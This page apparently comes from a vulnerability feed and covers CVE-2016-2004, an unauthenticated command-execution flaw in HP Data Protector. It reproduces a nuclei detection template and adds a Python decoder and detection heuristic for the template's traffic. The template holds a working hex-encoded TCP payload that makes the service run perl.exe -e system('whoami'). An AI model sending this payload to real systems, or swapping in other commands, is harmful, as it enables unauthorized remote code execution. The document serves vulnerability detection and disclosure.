HP Data Protector Arbitrary Command Execution Vulnerability

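Vulnerability Information

Vulnerability name: HP Data Protector Arbitrary Command Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2016-2004

Vulnerability type: Command execution

Severity: Critical

Description: HP Data Protector is enterprise-grade data backup and recovery software, widely used in organizations of all sizes to protect critical data from loss or corruption. Because it is so widely deployed, security problems in the software can affect a large number of enterprises and institutions. This vulnerability is a command execution issue whose technical root cause is an unfixed missing-authentication flaw in the software, the result of an incomplete fix for the earlier CVE-2014-2623. An attacker can remotely execute arbitrary code via unspecified vectors, and exploitation requires no authentication of any kind, so the barrier to attack is very low. An attacker who successfully exploits the vulnerability can execute arbitrary commands with the privileges of the Data Protector service account, which may lead to data disclosure, service disruption, or even complete control of the system. Because of its severity and ease of exploitation, it is rated critical. All users running affected versions are advised to upgrade to the latest version immediately to avoid potential security risk.

Vendor: HP

Product: Data Protector

Affected versions: before 7.03_108, 8.x before 8.15, and 9.x before 9.06

Source: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2016%2FCVE-2016-2004.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details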


id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x, NaN-KoreLogic
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.92734
    epss-percentile: 0.99751
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex
    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 490a0046304402205cb8d4fc530d3448a6fd8ee810f0c3ebf70d1061fecfe0c5b61fcdb60c0f055c02200ddf9aa8fc1921d76c065889e43a4401a29dd6de877e348916bcf601ecfef8bc:922c64590222798bb761d5b6d8e72950
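To make the template's two hex strings readable when reviewing packet captures, the following added example (not part of the nuclei template or of the original page) decodes them offline and flags requests of the same shape. The framing it assumes (4-byte big-endian length prefix, NUL-separated request fields, UTF-16 reply with a byte-order mark) is inferred from those two strings only, not from vendor documentation, and the function names are hypothetical.

```python
import struct

# Hex strings copied verbatim from the template's `inputs` and `matchers`.
PROBE_HEX = "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900"
REPLY_HEX = "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"


def split_frame(raw):
    """Return the body of a frame, checking the inferred 4-byte length prefix."""
    if len(raw) < 4:
        raise ValueError("frame shorter than its length prefix")
    (declared,) = struct.unpack(">I", raw[:4])
    body = raw[4:]
    if declared != len(body):
        raise ValueError(f"length prefix {declared} != body length {len(body)}")
    return body


def request_fields(raw):
    """Split a client request body into its non-empty NUL-separated fields."""
    return [f.decode("latin-1") for f in split_frame(raw).split(b"\x00") if f]


def reply_text(raw):
    """Decode a reply body (UTF-16 with BOM) and drop NUL padding."""
    return split_frame(raw).decode("utf-16").replace("\x00", "")


def is_exec_request(raw):
    """Detection heuristic (assumption): a field naming perl.exe followed by -e."""
    try:
        fields = [f.strip().lower() for f in request_fields(raw)]
    except ValueError:
        return False  # malformed or truncated frame; nothing to classify
    return any(a.endswith("perl.exe") and b.startswith("-e")
               for a, b in zip(fields, fields[1:]))


if __name__ == "__main__":
    probe, reply = bytes.fromhex(PROBE_HEX), bytes.fromhex(REPLY_HEX)
    print(request_fields(probe)[-2:])
    print(repr(reply_text(reply)))
    print(is_exec_request(probe), is_exec_request(reply))
```

Decoding shows that the matcher word is a complete reply frame, length prefix included, for the exact account string `nt authority\system`. A host whose Data Protector service runs under a different account returns a different frame, so a non-match from this template is not evidence that the host is patched.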


http://example.com/2025/07/06/github_2863097029/
Author: lianccc
Published: July 6, 2025